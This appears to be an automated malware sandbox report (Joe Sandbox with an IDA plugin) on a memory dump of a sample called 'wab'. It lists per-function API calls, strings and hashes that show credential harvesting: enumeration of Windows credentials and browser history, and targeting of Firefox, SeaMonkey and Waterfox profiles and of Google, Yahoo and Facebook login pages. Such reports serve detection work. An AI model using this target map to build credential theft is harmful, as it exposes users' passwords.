                  control_flow_graph 696 4466f4-44670e call 446904 GetModuleHandleA 699 446710-44671b 696->699 700 44672f-446732 696->700 699->700 701 44671d-446726 699->701 702 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 700->702 704 446747-44674b 701->704 705 446728-44672d 701->705 710 4467ac-4467b7 __setusermatherr 702->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 702->711 704->700 706 44674d-44674f 704->706 705->700 708 446734-44673b 705->708 709 446755-446758 706->709 708->700 712 44673d-446745 708->712 709->702 710->711 715 446810-446819 711->715 716 44681e-446825 711->716 712->709 717 4468d8-4468dd call 44693d 715->717 718 446827-446832 716->718 719 44686c-446870 716->719 722 446834-446838 718->722 723 44683a-44683e 718->723 720 446845-44684b 719->720 721 446872-446877 719->721 725 446853-446864 GetStartupInfoW 720->725 726 44684d-446851 720->726 721->719 722->718 722->723 723->720 727 446840-446842 723->727 729 446866-44686a 725->729 730 446879-44687b 725->730 726->725 726->727 727->720 731 44687c-446894 GetModuleHandleA call 41276d 729->731 730->731 734 446896-446897 exit 731->734 735 44689d-4468d6 _cexit 731->735 734->735 735->717
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                  • String ID:
                  • API String ID: 2827331108-0
                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0040C298
                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                  • wcschr.MSVCRT ref: 0040C324
                  • wcschr.MSVCRT ref: 0040C344
                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                  • GetLastError.KERNEL32 ref: 0040C373
                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                  • String ID: visited:
                  • API String ID: 1157525455-1702587658
                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 762 40e175-40e1a1 call 40695d call 406b90 767 40e1a7-40e1e5 memset 762->767 768 40e299-40e2a8 call 4069a3 762->768 770 40e1e8-40e1fa call 406e8f 767->770 774 40e270-40e27d call 406b53 770->774 775 40e1fc-40e219 call 40dd50 * 2 770->775 774->770 780 40e283-40e286 774->780 775->774 786 40e21b-40e21d 775->786 783 40e291-40e294 call 40aa04 780->783 784 40e288-40e290 ??3@YAXPAX@Z 780->784 783->768 784->783 786->774 787 40e21f-40e235 call 40742e 786->787 787->774 790 40e237-40e242 call 40aae3 787->790 790->774 793 40e244-40e26b _snwprintf call 40a8d0 790->793 793->774
                  APIs
                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                  • memset.MSVCRT ref: 0040E1BD
                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                  • _snwprintf.MSVCRT ref: 0040E257
                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                    • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                    • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                  • API String ID: 3883404497-2982631422
                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                  • memset.MSVCRT ref: 0040BC75
                  • memset.MSVCRT ref: 0040BC8C
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                  • memcmp.MSVCRT ref: 0040BCD6
                  • memcpy.MSVCRT ref: 0040BD2B
                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                  • String ID:
                  • API String ID: 509814883-3916222277
                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 847 41837f-4183bf 848 4183c1-4183cc call 418197 847->848 849 4183dc-4183ec call 418160 847->849 854 4183d2-4183d8 848->854 855 418517-41851d 848->855 856 4183f6-41840b 849->856 857 4183ee-4183f1 849->857 854->849 858 418417-418423 856->858 859 41840d-418415 856->859 857->855 860 418427-418442 call 41739b 858->860 859->860 863 418444-41845d CreateFileW 860->863 864 41845f-418475 CreateFileA 860->864 865 418477-41847c 863->865 864->865 866 4184c2-4184c7 865->866 867 41847e-418495 GetLastError ??3@YAXPAX@Z 865->867 870 4184d5-418501 memset call 418758 866->870 871 4184c9-4184d3 866->871 868 4184b5-4184c0 call 444706 867->868 869 418497-4184b3 call 41837f 867->869 868->855 869->855 877 418506-418515 ??3@YAXPAX@Z 870->877 871->870 877->855
                  APIs
                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                  • GetLastError.KERNEL32 ref: 0041847E
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile$??3@ErrorLast
                  • String ID: |A
                  • API String ID: 1407640353-1717621600
                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                  • String ID: r!A
                  • API String ID: 2791114272-628097481
                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                  APIs
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                    • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                    • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                  • _wcslwr.MSVCRT ref: 0040C817
                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                  • wcslen.MSVCRT ref: 0040C82C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                  • API String ID: 62308376-4196376884
                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                  APIs
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                  • wcslen.MSVCRT ref: 0040BE06
                  • _wcsncoll.MSVCRT ref: 0040BE38
                  • memset.MSVCRT ref: 0040BE91
                  • memcpy.MSVCRT ref: 0040BEB2
                  • _wcsnicmp.MSVCRT ref: 0040BEFC
                  • wcschr.MSVCRT ref: 0040BF24
                  • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                  • String ID:
                  • API String ID: 3191383707-0
                  • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                  • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                  • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                  • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                  APIs
                  • memset.MSVCRT ref: 00403CBF
                  • memset.MSVCRT ref: 00403CD4
                  • memset.MSVCRT ref: 00403CE9
                  • memset.MSVCRT ref: 00403CFE
                  • memset.MSVCRT ref: 00403D13
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 00403DDA
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Waterfox$Waterfox\Profiles
                  • API String ID: 3527940856-11920434
                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                  APIs
                  • memset.MSVCRT ref: 00403E50
                  • memset.MSVCRT ref: 00403E65
                  • memset.MSVCRT ref: 00403E7A
                  • memset.MSVCRT ref: 00403E8F
                  • memset.MSVCRT ref: 00403EA4
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 00403F6B
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                  • API String ID: 3527940856-2068335096
                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                  APIs
                  • memset.MSVCRT ref: 00403FE1
                  • memset.MSVCRT ref: 00403FF6
                  • memset.MSVCRT ref: 0040400B
                  • memset.MSVCRT ref: 00404020
                  • memset.MSVCRT ref: 00404035
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                  • memset.MSVCRT ref: 004040FC
                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                  • API String ID: 3527940856-3369679110
                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                  • API String ID: 3510742995-2641926074
                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                  APIs
                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                  • memset.MSVCRT ref: 004033B7
                  • memcpy.MSVCRT ref: 004033D0
                  • wcscmp.MSVCRT ref: 004033FC
                  • _wcsicmp.MSVCRT ref: 00403439
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                  • String ID: $0.@
                  • API String ID: 3030842498-1896041820
                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 2941347001-0
                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                  APIs
                  • memset.MSVCRT ref: 00403C09
                  • memset.MSVCRT ref: 00403C1E
                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                  • wcscat.MSVCRT ref: 00403C47
                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                  • wcscat.MSVCRT ref: 00403C70
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memsetwcscat$Closewcscpywcslen
                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                  • API String ID: 3249829328-1174173950
                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                  APIs
                  • memset.MSVCRT ref: 0040A824
                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                  • wcscpy.MSVCRT ref: 0040A854
                  • wcscat.MSVCRT ref: 0040A86A
                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                  • String ID:
                  • API String ID: 669240632-0
                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                  APIs
                  • wcschr.MSVCRT ref: 00414458
                  • _snwprintf.MSVCRT ref: 0041447D
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
